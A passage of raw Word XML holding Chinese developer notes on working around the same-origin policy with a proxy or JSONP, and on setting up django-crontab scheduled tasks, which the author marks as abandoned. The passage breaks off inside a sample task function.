      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求代理服务器，而不是直接请求另一个域的图片。这样，同源策略将不再是问题，因为请求和资源都在相同的域内。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4058BCC1" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="274E084A" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    JSONP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果图片服务器支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSONP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> JSONP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来获取图片。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JSONP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许你通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;script&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签加载跨域的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A0BFFE" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34EEAB3B" w14:textId="6CF26D8E" w:rsidR="00E51881" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，尽管上述方法可以绕过同源策略的限制，但要确保你的解决方案是安全的，不容易受到其他安全问题的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BD9C60" w14:textId="77777777" w:rsidR="00F4570B" w:rsidRDefault="00F4570B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC9C863" w14:textId="18D7C0C1" w:rsidR="00C57CAD" w:rsidRDefault="00C57CAD" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="657" w:name="_Toc159780087"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>jango</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定时任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57CAD">
        <w:t>django-crontab</w:t>
      </w:r>
      <w:r w:rsidR="00EB6839">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00EB6839" w:rsidRPr="00EB6839">
        <w:t xml:space="preserve"> celery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B0955">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（弃用）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="657"/>
    </w:p>
    <w:p w14:paraId="697057DD" w14:textId="77777777" w:rsidR="00C57CAD" w:rsidRDefault="00C57CAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E2A895" w14:textId="00795283" w:rsidR="00114E26" w:rsidRPr="005055BE" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005055BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>经过测试，该</w:t>
      </w:r>
      <w:r w:rsidRPr="005055BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r w:rsidRPr="005055BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>组件</w:t>
      </w:r>
      <w:r w:rsidRPr="005055BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> crontab</w:t>
      </w:r>
      <w:r w:rsidRPr="005055BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不好用，已放弃使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD6E354" w14:textId="654EFDA3" w:rsidR="005055BE" w:rsidRPr="005055BE" w:rsidRDefault="005055BE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005055BE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>同样废弃的有</w:t>
      </w:r>
      <w:r w:rsidRPr="005055BE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>celery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB1ECD2" w14:textId="77777777" w:rsidR="00114E26" w:rsidRPr="00C57CAD" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114CA997" w14:textId="45B4E603" w:rsidR="00311021" w:rsidRDefault="00C57CAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C57CAD">
        <w:t>python3 -m pip install django-crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB61C07" w14:textId="77777777" w:rsidR="00C57CAD" w:rsidRDefault="00C57CAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A94EA4" w14:textId="77777777" w:rsidR="00C57CAD" w:rsidRDefault="00C57CAD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4934BB" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、安装依赖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0578A5BB" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>pip install django-crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007AA877" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9D932D" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44241D29" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>settings.py INSTALLED_APPS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F7DFE" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E1159C9" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>INSTALLED_APPS = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAE25B2" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E907EA" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    'django_crontab'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E16537" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457165AB" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>settings.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中配置定时任务，增加一下代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A563826" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B4DA47" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定时任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D26B2C7" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A56618" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>范例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A6C7A" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每五分钟执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    */5 * * * *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46306248" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每小时执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">     0 * * * *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49373574" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每天执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       0 0 * * *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660A800D" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每周执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       0 0 * * 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDF558E" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每月执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       0 0 1 * *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E1F278" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>'''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F9CD1" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>CRONJOBS = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCFD2BF" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示每一分钟执行一次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED4CB8B" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # base.utils.task </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是创建的一个名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后新增一个名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>utils.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是文件内部的一个方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54916B63" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里要根据你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D19146" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ('*/1 * * * *', 'base.utils.task','&gt;&gt; /tmp/test_crontab.log')  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意必须先存在这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BF223E" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A916901" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67764C50" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405A8A0E" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6F11A0" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C041F75" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4537C0EB" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F0C321" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A6E9A" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF1EAD4" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA9B89" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BDAC6A" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618C2996" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5924397B" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBE034A" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D912564" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245462AB" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、编写定时任务方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5459FED4" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本例中是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>uitls.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下的一个方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B91FA83" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4431DB" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定时任务的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3539763A" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def task():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78795679" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F76421" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        loca_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC92FB6" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地时间：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'+str(loca_time))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43383E45" w14:textId="77777777" w:rsidR="00114E26" w:rsidRDefault="00114E26" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
